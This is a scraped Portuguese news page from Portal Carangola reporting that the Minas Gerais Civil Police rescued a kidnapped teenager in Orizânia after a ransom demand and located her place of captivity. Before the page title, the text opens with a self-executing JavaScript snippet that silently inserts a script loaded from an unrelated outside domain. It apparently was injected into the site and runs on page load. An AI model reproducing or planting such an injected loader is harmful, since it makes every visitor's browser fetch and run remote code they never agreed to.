;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil resgata adolescente sequestrada no município de Orizânia. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil resgata adolescente sequestrada no município de Orizânia.

A Polícia Civil de Minas Gerais realizou operação, nesta sexta-feira (08), no município de Orizânia, na região da Zona da Mata, que resultou no resgate da adolescente Micaela do Amaral Faria. A jovem foi seqüestrada na quarta-feira (06), por volta das 11h, na porta de sua residência, ao retornar da escola.

No mesmo dia, os sequestradores fizeram contato por telefone com a família, exigindo R$ 500 mil para libertar a refém. Imediatamente, uma equipe de 35 policiais civis começou a diligenciar para localizar a vítima e fornecer apoio aos familiares.

Por volta das 20h da quinta-feira (07), os criminosos liberaram a vítima em um local ermo do município. A jovem não apresentou lesões e foi ouvida na Delegacia de Polícia de Divino, junto com outras testemunhas.

Na manhã de hoje (08), a Polícia Civil, dando continuidade às investigações, localizaram o cativeiro onde a vítima foi mantida como refém. A perícia compareceu para os trabalhos de praxe e as investigações continuam a fim de prender os autores.

O veículo usado para o seqüestro foi tomado de assalto horas antes no Córrego do Bálsamo, em Orizânia, e localizado, posteriormente, incendiado, em uma estrada que liga Bom Jesus e Pedra Bonita.

Fotos: Divulgação PCMG

Acompanhe o facebook da Polícia Civil.

Assessoria de Comunicação – PCMG
(31) 3915-7182 – (31) 3915-7192
imprensa.pcmg@gmail.com

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.